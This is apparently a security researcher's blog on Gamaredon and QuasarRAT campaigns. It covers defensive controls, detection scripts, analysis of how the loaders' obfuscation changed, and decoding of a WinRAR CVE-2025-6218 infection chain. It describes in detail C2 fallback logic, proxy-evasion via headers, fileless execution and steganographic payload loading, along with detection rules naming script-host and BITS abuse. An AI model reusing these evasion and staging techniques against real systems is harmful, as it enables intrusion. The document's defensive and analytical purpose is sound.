Applied at the mail gateway or in attachment processing pipelines, YARA rules can prevent execution entirely instead of trying to detect activity after the user already clicked the file. From a defensive POV, that is always the better place to intervene.
I maintain a set of YARA rules specifically focused on Gamaredon loader patterns, including HTA- and VBScript-based stages observed from older and recent campaigns. These rules are meant for legitimate research and defensive use. If you are working in a security or incident response context and want to test or deploy them, feel free to contact me and I can provide them for evaluation and tuning.
YARA will not stop infrastructure shifts or payload changes, but it is very effective at removing large parts of the delivery layer that Gamaredon depends on. Combined with script execution controls and network visibility (read above), it significantly reduces the attackers room to operate.
Option 6: Shortcut (LNK) Abuse Mitigation
Gamaredon frequently abuses .lnk files as script launchers.
Controls:
Block .lnk execution from email attachment paths
Alert on:
LNK spawning wscript, mshta, powershell
Disable preview handlers for LNK in mail clients if possible
Option 7: Block / Restrict bitsadmin
This should be an addition, not just an option. As a fallback for MSXMLHTTP, Gamaredon introduced bitsadmin in their newest GamaLoad samples; you can read more about it here.
Disabling BITS entirely is not an option in most enterprise environments. Windows Update, Defender, SCCM and many enterprise management tools depend on it. Breaking BITS usually means breaking business.
The goal is therefore not to kill BITS, but to remove its value as a reliable malware loader.
Gamaredon doesn’t need stealthy tooling. They need something that works everywhere, survives bad networks and doesn’t get blocked. If you take away that reliability, the technique quickly becomes unattractive.
Below are several practical controls that achieve exactly that:
Block bitsadmin.exe, not BITS
bitsadmin.exe is merely a legacy command-line frontend for BITS. Modern software uses PowerShell or native APIs instead. In most environments, nothing legitimate depends on interactive use of bitsadmin.exe.
Scope: non-admin or Everyone, depending on your policy
Impact
Windows Update continues to work
Defender continues to work
SCCM and management tooling remain unaffected
But… Malware loses the easiest way to create BITS jobs
Why this hurts Gamaredon
Gamaredon’s loaders frequently invoke BITS directly from scripts and HTA stages. They rely on simple CLI execution, not on robust API-based fallbacks. Blocking the binary often breaks the entire staging chain.
Restrict Where BITS Is Allowed to Connect
BITS traffic is still regular HTTP/HTTPS traffic. It can and should be controlled at the network layer!
Control
On proxy or firewall level:
Allow BITS traffic only to:
Microsoft update endpoints
Internal patching infrastructure
Explicitly approved business domains
Block or inspect everything else.
Optional detection:
Alert on User-Agent: Microsoft BITS/* connecting to non-whitelisted domains.
Impact
Business traffic remains unaffected
Updates continue to function
External drop servers used by attackers fail reliably!
This is a strong IOC-less control that scales well in enterprise environments 🙂
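As a rough illustration of the detection side, this is the kind of check you could run over a proxy log export. The column names and the allowlist are placeholders, not a complete list of legitimate BITS destinations:
#!/usr/bin/env python3
# Sketch: flag BITS user-agent traffic to non-allowlisted destinations in a proxy log (CSV).
import csv
import sys

# Hypothetical allowlist; replace with your update and patching endpoints.
ALLOWED_SUFFIXES = (".windowsupdate.com", ".microsoft.com", "wsus.corp.example")

with open(sys.argv[1], newline="", encoding="utf-8") as fh:
    for row in csv.DictReader(fh):
        ua = row.get("user_agent", "")
        host = row.get("host", "").lower()
        if ua.startswith("Microsoft BITS/") and not host.endswith(ALLOWED_SUFFIXES):
            print(f"[!] BITS transfer to non-allowlisted host: {host}")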
Disrupt BITS Job Persistence
One of BITS’ advantages for attackers is job persistence: jobs survive logoffs, reboots and network interruptions.
Removing that persistence dramatically reduces reliability for staged malware delivery.
Control
Regularly purge queued jobs:
PowerShell example:
Get-BitsTransfer -AllUsers | Remove-BitsTransfer
Schedule this on workstations every 30–60 minutes (adjust to your needs)
Impact
Normal short-lived update jobs typically complete unaffected
Malware loses reliable staging and retry capability
Use caution during large enterprise software rollouts; this is also not the most effective control, imo.
Enforce Strong Telemetry on BITS Usage
As I already mentioned, if you cannot block it safely everywhere, make abuse visible!
Control
Enable command-line process auditing
Monitor:
Execution of bitsadmin.exe
Parent processes such as mshta.exe, wscript.exe
Correlate with network destinations and file writes
Impact
No production risk
High-quality detection signal
Low false-positive rate
Remember: BITS usage initiated from scripting engines is rarely legitimate
Behavioral Heuristics for BITS Abuse
For mature environments and advanced detection platforms:
Monitor for suspicious patterns such as:
BITS downloads into:
%TEMP%
%APPDATA%
User profile writable paths
Randomized file names
Short-lived jobs followed immediately by execution
Non-corporate TLS destinations
This can be implemented via:
ETW telemetry
Defender Advanced Hunting
Custom sensors and collectors
Provides behavioral detection without relying on static indicators
Visibility beats prevention
At minimum, you need to have visibility into:
wscript.exe (classic VBS/JS execution)
cscript.exe (same, console version)
mshta.exe (HTA execution, including embedded VBScript/JS)
powershell.exe (still relevant, second stage)
But execution alone is only half of the picture here. In Gamaredon campaigns, script hosts are usually paired with a built-in Windows networking component: MSXMLHTTP.
Inside the script, outbound communication is (mostly) handled via these components:
MSXML2.XMLHTTP
MSXML2.ServerXMLHTTP
From the outside, this generally looks like a normal process making web requests. There is no external downloader, no suspicious binary and no obvious command line indicator, since everything happens inside the script host process itself.
That means defenders should not only care that a script host started, but also whether that process immediately initiated network connections. Script execution without network activity might be a test or a failure. Script execution followed by HTTP traffic is the actual attack.
If your telemetry cannot correlate:
script execution
with outbound connections
and with the destination domain or IP
then you are missing the exact phase where Gamaredon (or other Threat Actors) transitions from initial access to payload delivery.
tldr; seeing the script start is useful. Seeing the script talking to the internet is what actually tells you that the infection chain is active
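If your telemetry is Sysmon-like, the correlation itself is not complicated. The sketch below joins process-creation and network-connection exports on the process GUID; the column names are assumptions and the script-host list mirrors the binaries discussed above:
#!/usr/bin/env python3
# Sketch: correlate script-host process starts with their outbound connections
# using two CSV exports (process creation + network connections).
import csv
import sys

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}

def load(path):
    with open(path, newline="", encoding="utf-8") as fh:
        return list(csv.DictReader(fh))

procs = {}
for r in load(sys.argv[1]):
    image = r.get("Image", "").lower().rsplit("\\", 1)[-1]
    if image in SCRIPT_HOSTS and r.get("ProcessGuid"):
        procs[r["ProcessGuid"]] = r

for conn in load(sys.argv[2]):
    proc = procs.get(conn.get("ProcessGuid", ""))
    if proc:
        dest = conn.get("DestinationHostname") or conn.get("DestinationIp", "?")
        print(f"[!] {proc.get('Image')} (parent: {proc.get('ParentImage', '?')}) -> {dest}")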
Alert on Parent-Child Process Chains, Not on Filenames
Gamaredon changes filenames constantly. That is not where stability is.
What does not change:
Email client -> script host
Explorer -> shortcut -> script host
Script host -> network activity
Those relationships are far more reliable than any hash or URL
If your detection logic is still focused on “known bad files”, you are solving yesterday’s problem. Behavior survives infrastructure rotation … but IOCs do not.
Treat Failed Infections as Intelligence, Not as Non-Events
One of the more frustrating patterns when tracking Gamaredon is how many times infection attempts partially fail. The loader runs, the payload is blocked or the network request never completes.
From an incident-response POV, this could be treated as “problem solved”.
From an intelligence perspective, I think it’s a gift.
Those events tell you:
Which attachment types are used
Which execution paths are attempted
Which infrastructure is currently active
If you only investigate successful infections, you will always be late. The campaigns that fail today are the ones that succeed tomorrow with minor adjustments. If you understand Gamaredon properly, you can always be a step ahead.
Accept That Something Will Slip Through – Just Plan Around That
Perfect prevention is a nice idea, but ideas are just ideas. It is not how real environments work.
Gamaredon does not need persistence for months. It needs minutes of execution. If those minutes go unnoticed, the damage is already done, regardless of whether the payload later gets removed.
Your defensive strategy needs to assume:
Some scripts will execute
Some attachments will be opened
Some rules will be bypassed
The question here is whether anyone notices in time to react.
Visibility does not replace prevention at all. But without visibility, prevention failures become silent compromises. And silent compromises are exactly what this actor benefits from. You could say that visibility complements your prevention efforts.
Network controls that matter
From a network POV, Gamaredon is not noisy. It does not deploy custom backdoors that beacon every few seconds and it does not rely on exotic protocols. Most of the traffic is simple http(s) generated directly from scripts using tools like MSXML2.XMLHTTP.
That has two important consequences for defenders.
First, there is no separate downloader process to catch. The same process that executed the script is now making web requests. Just mshta.exe or wscript.exe talking to the internet like a perfectly normal Windows application.
Second, many network controls are designed around detecting known bad destinations, not suspicious clients. If you only look at where traffic goes, but not who is sending it and under which circumstances, you miss the entire initial delivery phase.
For Gamaredon style campaigns network defense has to focus on context, NOT just destination.
Correlate Network Traffic With Process Activity
If a script host executes and immediately initiates outbound connections, that is not normal workstation behavior.
At minimum, be able to answer:
Which process opened the connection?
What launched that process?
What file triggered the execution?
MSXMLHTTP-based traffic will look perfectly legitimate on the wire unless you know it came from a script that just executed from a mail attachment.
Normalize Outbound HTTP Behavior
One of the more uncomfortable lessons when tracking Gamaredon is that attackers actively use network behavior itself as a detection mechanism.
In several waves, delivery depended on whether certain headers, especially Content-Length (in the latest GamaLoad samples), matched what the script originally set. Many commercial proxy setups modify requests by:
re-encoding bodies
switching between chunked and fixed-length transfers
inspecting and rewriting traffic
From the attacker’s side, that becomes a cheap and reliable way to identify analysis environments and block payload delivery.
Defensively, this means:
Outbound traffic needs to be as predictable and uniform as possible
Proxy behavior should be consistent across user and analysis environments
Sudden header manipulation should be considered a detection signal, not just a networking detail!!!
Otherwise, you end up with the worst possible situation: real users get infected, while analysis systems receive fake or destructive payloads
DNS as a detection surface
Treat DynDNS and Low-Rep Domains as High-Risk by Default
Gamaredon infrastructure heavily relies on:
dynamic DNS providers
rapidly changing subdomains
short-lived hosting setups
Blocking individual domains is pointless. They rotate too fast. What does not change is the type of infrastructure being used.
From a defensive standpoint, this means:
DynDNS traffic has to be restricted, monitored or at least flagged
Newly registered domains should not be treated the same as established ones
DNS telemetry is worth including in detection logic, not just resolution
If your network policy implicitly trusts any domain that resolves, you are trusting exactly the layer Gamaredon is built on
What to Monitor Instead of Chasing Domains
DNS telemetry provides several signals that remain useful even when infrastructure rotates:
Domain age: Newly registered domains should be treated differently from domains that have existed for years. Many Gamaredon delivery endpoints fall into the “new/very new” category.
Provider patterns: Certain DynDNS and free subdomain services appear repeatedly across campaigns.
Subdomain churn: Rapidly changing subdomains under the same parent domain are a common pattern. This is not normal behavior for most legitimate services used by end users.
NXDOMAIN spikes: Failed DNS lookups shortly before successful connections can indicate scripted discovery or fallback logic inside loaders. Since this pattern is very common, it is a strong signal for finding Gamaredon-related activity, and it can be detected even if timeouts and sleeps are used.
None of these signals alone proves malicious intent, but together they describe infrastructure behavior that is highly consistent with how Gamaredon operates. Once this dynamic is understood, the operational flexibility that makes Gamaredon effective becomes a liability that defenders can exploit 🙂
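To make this a bit more concrete, here is a very rough scoring sketch over a DNS query log export. The column names, thresholds and the dynamic-DNS provider list are placeholders, and the registered-domain extraction is deliberately naive. Treat it as a starting point for your own logic, not a finished detection:
#!/usr/bin/env python3
# Sketch: surface "disposable infrastructure" behavior (DynDNS parents, subdomain churn,
# NXDOMAIN spikes) from a DNS query log CSV with 'query' and 'rcode' columns.
import csv
import sys
from collections import Counter, defaultdict

DYNDNS_PARENTS = {"ddns.net", "hopto.org", "duckdns.org"}  # example providers only

def parent(qname: str) -> str:
    # naive: last two labels; good enough for a sketch, wrong for co.uk-style TLDs
    return ".".join(qname.split(".")[-2:])

subdomains = defaultdict(set)
nxdomain = Counter()

with open(sys.argv[1], newline="", encoding="utf-8") as fh:
    for row in csv.DictReader(fh):
        q = row.get("query", "").lower().rstrip(".")
        if not q:
            continue
        p = parent(q)
        subdomains[p].add(q)
        if row.get("rcode") == "NXDOMAIN":
            nxdomain[p] += 1

for p, subs in subdomains.items():
    flags = []
    if p in DYNDNS_PARENTS:
        flags.append("dyndns")
    if len(subs) > 10:
        flags.append(f"churn: {len(subs)} subdomains")
    if nxdomain[p] > 5:
        flags.append(f"nxdomain spikes: {nxdomain[p]}")
    if flags:
        print(f"[!] {p}: {', '.join(flags)}")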
Restriction Beats Blacklisting
If possible, access to high-risk DNS categories has to be restricted by policy, not just monitored.
This can include:
blocking or limiting known DynDNS providers
forcing additional inspection or logging for low-reputation domains
isolating traffic to newly registered domains
The goal is not to eliminate all risk (that is unrealistic) but to reduce the attackers ability to operate entirely in disposable infrastructure without triggering any response.
Gamaredon depends on infrastructure that can be replaced quickly and cheaply. Defensive strategies have to make that approach operationally expensive instead of operationally invisible.
DNS Is Not Just Plumbing
In many environments, DNS is treated as a purely technical service: something that resolves names and moves on. From a threat detection perspective, that is a wasted opportunity.
DNS shows:
where systems are trying to go
how often endpoints change
whether communication targets look stable or disposable
Especially in script-driven infection chains, DNS can be the first external signal that something has moved from local execution to external communication.
If DNS data is not included in your detection logic, then a large portion of Gamaredon activity will look like harmless background traffic until much later in the attack chain.
In my opinion, proper DNS logging should always be part of a defensive strategy, regardless of which threat actor you are dealing with.
Prepare for anti-analysis
One thing that becomes obvious to me when tracking Gamaredon over time is that they do not just try to avoid detection, they actively react to analysis.
Payload delivery and script behavior can change depending on the environment. Analysis systems may receive different payloads, broken samples or nothing at all, while real victims get fully functional stages. What you see in a sandbox is not always what happens in the wild.
This means relying on a single analysis setup is risky. If all samples run through the same sandbox, the same proxy and the same network profile, that environment becomes easy to fingerprint and easy to avoid.
Analysis systems should look as boring and realistic as possible.
The takeaway from my analysis is simple: when the attacker adapts to being observed, your analysis pipeline becomes part of the attack surface. If you do not account for that, you may be analyzing exactly what the attacker wants you to see.
More information
If you want to know more about Gamaredon, check out my latest articles:
In malware analysis, it is tempting to describe change as innovation. New tricks, new tooling, new malware families. What is far more revealing, however, is how little actually changes and what changes anyway.
Between late November and the end of December 2025, several Gamaredon-related VBScript loaders surfaced that are, functionally, almost identical. They all execute the same mechanism, rely on the same execution primitive, and ultimately aim for the same outcome.
And yet, something does change, quietly, incrementally, and very deliberately.
This article focuses strictly on observable, concrete shifts in obfuscation, not assumptions, not intent inferred from tooling, and not architectural leaps that are not supported by the samples themselves.
The earliest sample in this series is characterized by:
Hundreds of variables that are written to once and never read again
Repeated arithmetic mutations (x = x + 14) without semantic relevance
Long linear execution flow
No variable declarations (Dim entirely absent)
The obfuscation here serves one purpose only: syntactic noise.
There is no attempt to:
Hide control flow
Delay string resolution
Reconstruct logic conditionally
Everything is present in the source, just buried under irrelevant assignments.
From an analyst’s perspective, this sample is noisy but predictable. Once dead code is ignored, execution logic collapses into a short, linear sequence.
19 December 2025 – Indicator overload
The mid-December sample introduces a clear and measurable change: indicator density.
New observations:
A significant increase in hard-coded URLs
URLs pointing to unrelated, legitimate, and state-adjacent domains
No execution dependency on most of these URLs
Crucially, these URLs are not obfuscated. They are placed in plain sight.
This is not string hiding; it is indicator flooding.
The obfuscation shift here is not technical complexity, but analytical friction:
Automated extraction produces dozens of false leads
IOC-based clustering becomes unreliable
Manual triage cost increases without changing execution logic
The loader still behaves linearly. What changes is the signal-to-noise ratio.
22 December 2025 – Defensive Reaction at the Payload Layer
The December 22 sample is not an obfuscation milestone, but it is a defensive one.
From a loader perspective, almost nothing changes:
The download URL is fully present and statically recoverable
No additional string hiding or control-flow manipulation is introduced
Execution remains linear and transparent
However, focusing solely on loader complexity misses the actual shift.
The real change happens at the payload layer.
For the first time in this series, the loader delivers GamaWiper instead of Pterodo to analysis environments.
This is not a neutral substitution.
As outlined in my earlier analysis of GamaWiper’s behavior, this payload is explicitly designed to wipe the analysis environment rather than deliver any further functionality.
Notably, this change occurs almost exactly four weeks after my article outlining practical approaches to tracking Gamaredon infrastructure went public. Whether coincidence or feedback loop, the timing aligns remarkably well with the first observed deployment of GamaWiper as an anti-analysis response.
25 December 2025 – Control-Flow Noise Appears
The Christmas sample does not introduce new primitives, but it does introduce execution ambiguity.
Concrete changes:
Multiple .Run invocations exist
Not all of them result in meaningful execution
Several objects and variables are constructed but never used
Execution order is less visually obvious
This is not branching logic, but control-flow camouflage.
The analyst can still reconstruct execution, but:
Dead paths look plausible
Execution sinks are no longer unique
Automated heuristics struggle to identify the real one
The obfuscation no longer targets strings, it targets execution clarity.
30 December 2025 – Fragmented Runtime Assembly
The final sample introduces the most tangible structural changes.
Observed differences:
Systematic use of Dim declarations
Extensive use of short, non-semantic string fragments
Assembly of execution-relevant strings via repeated concatenation across distant code sections
No complete execution string exists statically
The embedded domains are just random, invalid domains
At no point does the full execution command exist as a contiguous value in the source.
Instead:
Fragments are combined
Recombined
Passed through intermediate variables
Finalized immediately before execution
This directly degrades:
Static string extraction
Signature-based detection
Regex-driven tooling
No encryption is added. The shift is purely architectural.
05 January 2026 – Added Datetime Parameter to URL
EDIT 07.01.2026: I added this part as new findings appeared
Since early January, another small but relevant change appeared in the loader logic.
The scripts now generate a date value at runtime:
This value is then embedded directly into the download path, resulting in URLs like:
From a detection standpoint, this is subtle but effective.
This means:
payload paths change daily
static URL signatures age out immediately
and IOC reuse across campaigns becomes unreliable
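Purely as an illustration (the real date format and delivery hosts are deliberately not reproduced here), this is roughly why a runtime date component makes static URL signatures worthless:
#!/usr/bin/env python3
# Illustration only: a download path that embeds a runtime-generated date value
# changes every day, so yesterday's URL signature no longer matches today's request.
from datetime import date

BASE = "http://delivery-host.invalid"          # placeholder, not a real indicator
stamp = date.today().strftime("%d%m%Y")        # hypothetical date format
print(f"{BASE}/payload_{stamp}.jpeg")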
Relation to Prior Observations
This behavior aligns closely with patterns discussed in my earlier article on GamaWiper and Gamaredon’s anti-analysis strategies, where delivery behavior adapts based on perceived execution context.
After my recent blog posts covering Gamaredon’s ongoing PterodoGraph campaign targeting Ukraine, and following almost a full month of silence in terms of newly observed malware samples, fresh activity has finally resurfaced.
New samples have appeared, along with reports pointing to a component now referred to as GamaWiper.
It is important to note that GamaWiper, or at least very similar scripts, has already been observed in Gamaredon operations in previous months. From a purely technical standpoint, this functionality is therefore not entirely new.
What is new, however, is the context in which it is now being deployed.
In this article, I aim to shed some light on what GamaWiper actually is, why Gamaredon is actively delivering it at this stage of the infection chain, and what this shift tells us about the group’s current operational mindset. What initially appears to be just another destructive payload instead turns out to be a deliberate control mechanism, one that decides who receives the real malware and who gets wiped instead
I’ll keep this post a bit shorter and focus only on what’s new, so it doesn’t get boring. If you’re looking for deeper technical details, please refer to my previous posts from 22.11.2025 and 13.11.2025, where I covered the core mechanics in depth.
For this analysis, I’m using my deobfuscated version of the sample; next time I’ll maybe show you how to deobfuscate Gamaredon scripts manually in less than 10 minutes.
After downloading the latest Gamaredon malware sample, it immediately became obvious that the current variants differ noticeably from what we’ve seen before.
Note: I started writing YARA rules for Gamaredon’s current samples, you can find them here.
Key Changes at a Glance
Junk URLs now closely resemble real payload delivery URLs
No full Pterodo payload is delivered anymore 🙁
Gamaredon has hardened the delivery of Pterodo samples
Infection Flow – What Changed?
After the user opens the RAR archive and infects their system, the behavior initially looks familiar. On reboot, the Pterodo sample is fetched again, but only if the client is geolocated in Ukraine, as already mentioned in my previous blog posts.
Previously, non-UA clients would simply receive:
an empty page, or
an empty file
Today, however, things look a bit different.
Instead, the client receives GamaWiper.
GamaWiper – Sandbox? Gone.
GamaWiper is essentially a sandbox / VM killer whose sole purpose is to prevent analysis environments from seeing anything useful.
In earlier campaigns, this wasn’t always handled very well. For example, when I used Hybrid-Analysis, it was trivial to extract:
Telegram channels
Graph URLs
infrastructure relationships
This was a classic infrastructure design flaw and a great example of what budget cuts can do to an APT operation 😄
Today, however, the approach is much simpler:
If a sandbox is detected -> wipe it
No telemetry, no infrastructure leaks, no fun.
If you are doing legitimate malware research and are interested in (deobfuscated) samples from Gamaredon, you can write me an email.
Initial Loader: “GamaLoad”
The initial loader, which I’ll refer to as GamaLoad, implements a multi-stage payload fetch mechanism with dynamically constructed URLs and headers. The goal is resilience: fetch stage two no matter what.
Note: All malicious domains have been removed.
Request Characteristics
Request Type
Method: GET
Client: msxml2.xmlhttp
Execution: synchronous
URL Structure
Each request fetches a randomly generated resource:
/<random>.<ext>
Random filename: 7-10 characters (a-z, 0-9)
Camouflage extensions, e.g.:
wmv
yuv
lgc
rm
jpeg
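For hunting in proxy or web logs, the path shape itself is already usable. Here is a small sketch that matches the pattern described above; expect false positives, this is a shape, not an IOC:
#!/usr/bin/env python3
# Sketch: match GamaLoad-style request paths (7-10 char [a-z0-9] filename
# plus one of the camouflage extensions). Feed URLs via stdin, e.g.:
#   cat urls.txt | python3 url_shape.py
import re
import sys

PATTERN = re.compile(r"/[a-z0-9]{7,10}\.(wmv|yuv|lgc|rm|jpeg)$")

for line in sys.stdin:
    url = line.strip()
    if PATTERN.search(url.split("?")[0]):
        print(f"[?] shape match: {url}")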
C2 Fallback Order
The script iterates through multiple sources until a valid payload is received:
Argument URL (if passed at execution)
Hardcoded fallback
Cloudflare Workers domain
Domain fetch using @ notation
Abuse of the URL userinfo field
Dynamic host via check-host.net
HTML parsing
live host extraction
Alternative domain (again using @ notation)
Registry-based URL
Once a working C2 is found, it is stored as a persistent C2 entry.
HTTP Headers
The request uses very explicit and intentionally crafted headers.
User-Agent
A browser-like string combined with a host fingerprint, including:
Computer name
Drive serial number (hex-encoded)
Timestamp
UTC+2
Ukrainian local time expected
Cookie
Static campaign identifier
Rotates regularly (more on that below)
Content-Length
Explicitly set
Even for GET requests
Enables victim identification & tracking; also plays a role in proxy evasion (see below)
Success Condition
A request is considered successful when:
HTTP status is 200
Response size is greater than 91 bytes
Once this condition is met, all remaining fallbacks are skipped.
Payload Processing
Payload received as binary
UTF-8 conversion
Cleanup (CR/LF, delimiters)
Base64 decoding
In-memory execution
No disk writes – classic fileless execution
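If you have a captured response body from a real delivery, the same processing chain can be replayed offline to recover stage two. A minimal sketch (the delimiter handling is an assumption and may need adjusting per capture):
#!/usr/bin/env python3
# Sketch: replay the loader's payload processing on a captured response body:
# bytes -> UTF-8 text -> strip CR/LF and delimiters -> Base64 decode -> stage two.
import base64
import re
import sys
from pathlib import Path

raw = Path(sys.argv[1]).read_bytes()
text = raw.decode("utf-8", errors="ignore")
cleaned = re.sub(r"[^A-Za-z0-9+/=]", "", text)   # drop CR/LF and any other delimiters
payload = base64.b64decode(cleaned + "=" * (-len(cleaned) % 4))
Path("stage2.bin").write_bytes(payload)
print(f"wrote {len(payload)} bytes to stage2.bin")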
Evasion Techniques
Multi-stage fallback logic
Dynamic hosts
Delays between requests
Victim-specific User-Agent
Below is an example of a fully constructed request header sent to the payload delivery host.
Payload Rotation
Gamaredon currently rotates payloads every 1-3 hours.
With each rotation, the following variables may change:
Domains for Payload Delivery
User-Agent
Cookie
Content-Length
Why Is Content-Length Set?
The Content-Length HTTP header specifies the size of the request or response body in bytes. Its typical purpose is:
Defining message boundaries
Preventing truncated reads
Enabling correct stream handling
In this case, however, I strongly believe the header is set intentionally for tracking and proxy evasion.
Why?
The loader uses msxml2.xmlhttp. When calling .send() via this client, the Content-Length header is not overwritten.
For a normal residential client, this is usually not an issue. However, many HTTP/HTTPS proxies, especially residential and chained proxies, fail to handle this properly and may:
break the connection
modify the request
normalize headers
This behavior is highly detectable.
My conclusion: Gamaredon likely uses this mechanism to filter out proxy-based analysis setups. The choice of client and header behavior is far too specific to be accidental.
So, if you end up receiving GamaWiper instead of a payload, now you know why.
Conclusion
Gamaredon has clearly tightened its operational security.
The infrastructure flaws that previously allowed easy extraction of internal details have been addressed, and sandbox detection has shifted from “leaky but useful” to “wipe and move on”.
While these changes will certainly disrupt some tracking and automated analysis systems, the overall approach feels… let’s say pragmatic, but somewhat heavy-handed.
I am currently analyzing the recent surge of malware samples exploiting the WinRAR vulnerability CVE-2025-6218. During this research, I found a new sample on abuse.ch which appears to be part of a small QuasarRAT malware campaign.
What is CVE-2025-6218? (Short summary for this analysis)
CVE-2025-6218 is a WinRAR vulnerability that allows a crafted archive to place a file outside the chosen extraction directory, for example into the Windows startup folder, when the archive is opened or extracted. The user only sees a normal archive being unpacked, while persistence is established in the background.
After extracting the outer archive, we obtain another RAR file. Before unpacking it, we take a look at its contents in the hex view to check for anything suspicious.
xxd c67cc833d079aa60d662e2d5005b64340bb32f3b2f7d26e901ac0b1b33492f2f.rar | less
We can already see the suspicious ADS payload inside the RAR block. With this confirmation, we proceed to extract the archive using 7-Zip.
The script downloads an HTML Application (HTA) file from a GitHub repository. At the time of writing, both the repository and the user account have already been deleted. However, I uploaded a backup of the user’s repositories here.
Here is a screenshot of the repository and the associated profile:
Interestingly, the account only follows one inactive user with the Username “Levbohol / лев” :
Next, I inspected the verification.hta file that was downloaded from the repository.
The file contains a lightly obfuscated HTA script. I decoded the fromCharCode array into ASCII, resulting in the following code:
The script downloads yet another file named ilovelovelove.txt and executes it. Let’s take a closer look at that text file.
We are now looking at a heavily obfuscated DOS batch file. The first things that stand out are numerous variable assignments using set ... and comments prefixed with the REM keyword.
The comments are merely junk intended to distract the analyst. The variable assignments, however, are more complicated.
Some of the variables are never used anywhere in the script; these are clearly junk statements meant to confuse the reader. Other variables are used during execution and must be isolated and replaced with their actual runtime values. We also encounter various uninitialized variables, which are also junk, since they never carry a value.
Before proceeding, I remove all comments from the file.
sed -i '/^[Rr][Ee][Mm]/d' ilovelovelove.txt
Next, I isolate all variables that can be identified as junk, meaning variables that are referenced but never assigned a value.
grep -oE '%[^%]+%' ilovelovelove.txt > isolated_set_commands.txt
# For each %VAR% reference: if its name occurs fewer than two times in the script,
# it is referenced but never assigned -> collect it as removable junk.
while read -r line; do
    x=$(echo "$line" | sed 's/%//g')
    res="$(grep "$x" ilovelovelove.txt | wc -l)"
    if [ "$res" -lt 2 ]; then
        echo "$line"
    fi
done < isolated_set_commands.txt >> removable.txt
rm isolated_set_commands.txt
I then remove all uninitialized variables from the script completely.
while read -r line; do sed -i "s|$line||g" ilovelovelove.txt; done < removable.txt
The script is now much cleaner, but some junk variables still remain. These were not properly filtered out because they were detected as variable placeholders inside strings. To handle this, we isolate them and remove any variable that does not have a corresponding set assignment.
I also found many Base64 strings in the script, but none of them appear to form recognizable structures at this point, so we ignore them for now. Next, we replace every remaining variable with its assigned value.
For this purpose, I wrote a small helper script:
#!/bin/bash
# Replace every remaining %VAR% placeholder with its assigned value.
# Placeholders without a matching "set VAR=" line are treated as junk and removed.
grep -oE '%[^%]+%' ilovelovelove_copy.txt > usable.txt
while read -r line; do
    fstr="$(echo $line | sed 's/%//g')"
    x=$(grep "set $fstr" ilovelovelove_copy.txt | wc -l)
    if [ $x -lt 1 ]; then
        # no assignment found -> junk placeholder, drop it
        sed -i "s|$line||g" ilovelovelove_copy.txt
        continue
    fi
    # pull the assigned value and substitute it in place of the placeholder
    value=$(grep "set $fstr" ilovelovelove_copy.txt | cut -d'=' -f2)
    echo "$line $value"
    clean_line=$(echo -n "$line")
    clean_value=$(echo -n "$value")
    sed -i "s|$clean_line|$clean_value|g" ilovelovelove_copy.txt
done < usable.txt
After running the helper script, the cleaned batch script now looks like this:
After removing all ^M carriage returns, we obtain the following finalized version:
The script queries root\SecurityCenter2 via WMI to identify installed antivirus solutions. Depending on the detected product, it downloads different Base64-encoded payloads, decodes them, and executes them in memory using Invoke-Expression.
2. Downloading a hidden payload from a PNG file
Regardless of the antivirus result, the script then downloads a PNG image from a remote URL. This PNG contains embedded binary data stored inside pixel values (steganography).
The script:
reads each pixel,
reconstructs byte arrays from RGB values,
uses two pixels as payload length markers,
extracts the payload portion,
decompresses it via GZIP.
The result is a .NET assembly (DLL) extracted directly into memory.
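To get at the embedded assembly without executing anything, the pixel extraction can be reimplemented offline. The sketch below follows the scheme described above, but the exact layout (which pixels carry the length marker, byte order, channel order) is an assumption and usually has to be adjusted per sample:
#!/usr/bin/env python3
# Sketch: rebuild the byte stream from the PNG's RGB pixel values and gunzip the
# embedded .NET assembly. The length-marker layout below is an assumption.
import gzip
import sys

from PIL import Image  # pip install pillow

img = Image.open(sys.argv[1]).convert("RGB")
data = bytearray()
for r, g, b in img.getdata():
    data.extend((r, g, b))

# Assumption: the first two pixels (6 bytes) act as the length marker,
# with the payload length in the first 4 bytes, little-endian.
length = int.from_bytes(bytes(data[0:4]), "little")
payload = bytes(data[6:6 + length])

assembly = gzip.decompress(payload)
with open("extracted_assembly.dll", "wb") as out:
    out.write(assembly)
print(f"extracted {len(assembly)} bytes")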
3. Reflective loading of the DLL
The DLL is never written to disk. Instead, it is:
loaded directly into memory,
executed via .NET reflection,
its entry point is invoked (with or without parameters).
This technique avoids leaving artifacts on disk and bypasses many detection mechanisms.
4. Execution of the final malware payload
The final payload, typically a stealer or remote-control module, runs fully in memory.
A quick VirusTotal scan provides additional details:
VirusTotal classifies the malware as Zusy (also known as Barys). Zusy is an older but still active family of Windows malware. It has appeared for many years in small-scale campaigns and is typically used to steal credentials, browser information, or banking data. It is written in native C/C++; to confirm this, I’ll take a look at the file in Ghidra.
When analyzing a binary in Ghidra, the presence of functions named .ctor or .cctor is a strong indicator that the file contains .NET managed code. These method names come directly from the Common Language Runtime (CLR) and follow the naming conventions defined by the ECMA-335 Common Language Infrastructure (CLI) specification.
This indicates that we are not dealing with a typical Zusy malware sample, as Zusy does not use .NET managed code in any part of its execution chain.
I also uploaded the file to abuse.ch, where it was classified as “QuasarRAT”. This classification makes sense, as QuasarRAT is a remote access trojan written entirely in .NET.
QuasarRAT is a well-known open-source Windows remote access tool that has been abused by cybercriminals for years. It provides features such as keylogging, credential theft, file management, remote command execution, and real-time system monitoring. Because it is written in .NET, it is frequently modified, repacked, or extended by threat actors, making it easy to customize and embed into multi-stage loaders.
It is also interesting to examine the domains contacted by the malware.
The malware first retrieves the host’s public IP address using ipwho.is, and then contacts its command-and-control (C2) server hosted on the domain: